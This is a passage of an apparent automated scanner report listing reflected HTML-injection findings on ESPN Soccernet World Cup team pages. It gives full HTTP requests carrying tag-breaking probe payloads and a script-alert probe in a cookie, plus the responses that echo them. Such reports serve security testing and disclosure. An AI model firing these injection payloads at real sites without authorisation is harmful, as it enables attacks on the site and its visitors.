This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4860/north-korea94792"><a>24dd3ae9355 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:05 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN10
Cache-Expires: Sat, 06 Nov 2010 23:33:05 GMT
Content-Length: 81813
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>North Korea Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=4860&_slug_=north-korea94792"><a>24dd3ae9355&topId=803573&linktext=North+Korea+coach+proud+of+players">
...[SNIP]...
|
2.50. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/4860/north-korea |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85746"><a>c9e9c662c34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4860/north-korea?85746"><a>c9e9c662c34=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:23:57 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:23:57 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN07
Cache-Expires: Sat, 06 Nov 2010 23:28:57 GMT
Content-Length: 81921
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>North Korea Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=4860&85746"><a>c9e9c662c34=1&_slug_=north-korea&85746">
...[SNIP]...
|
2.51. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/624/algeria |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced83"><a>be36cbbeb72 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/624/algeriaced83"><a>be36cbbeb72 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:10 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:13:10 GMT
Content-Length: 81717
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Algeria Football /
...[SNIP]...
<a href="/worldcup2010/team?team=624&_slug_=algeriaced83"><a>be36cbbeb72&topId=795940&linktext=Saifi+accused+of+slapping+journalist">
...[SNIP]...
|
2.52. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/624/algeria |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d7f4"><a>1a4281499ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/624/algeria?9d7f4"><a>1a4281499ae=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:07 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sat, 06 Nov 2010 23:12:07 GMT
Content-Length: 81825
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Algeria Football /
...[SNIP]...
<a href="/worldcup2010/team?team=624&9d7f4"><a>1a4281499ae=1&_slug_=algeria&9d7f4">
...[SNIP]...
|
2.53. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/627/japan |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f74e2"><a>61cba004527 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/627/japanf74e2"><a>61cba004527 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:19:24 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:19:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sat, 06 Nov 2010 23:24:24 GMT
Content-Length: 81475
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Japan Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=627&_slug_=japanf74e2"><a>61cba004527&topId=804089&linktext=Japan+search+for+new+boss">
...[SNIP]...
|
2.54. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/627/japan |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f5b1"><a>ddd77a815e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/627/japan?7f5b1"><a>ddd77a815e5=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:15:11 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:15:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 06 Nov 2010 23:20:11 GMT
Content-Length: 81583
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Japan Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=627&7f5b1"><a>ddd77a815e5=1&_slug_=japan&7f5b1">
...[SNIP]...
|
2.55. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/628/australia |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c26"><a>970c5e66c8e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/628/australia91c26"><a>970c5e66c8e HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:55 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN07
Cache-Expires: Sat, 06 Nov 2010 23:13:55 GMT
Content-Length: 82012
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Australia Football
...[SNIP]...
<a href="/worldcup2010/team?team=628&_slug_=australia91c26"><a>970c5e66c8e&topId=792986&linktext=Striker+hits+out+over+coach%27s+tactics">
...[SNIP]...
|
2.56. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/628/australia |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f41f3"><a>62eb963c13c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/628/australia?f41f3"><a>62eb963c13c=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; 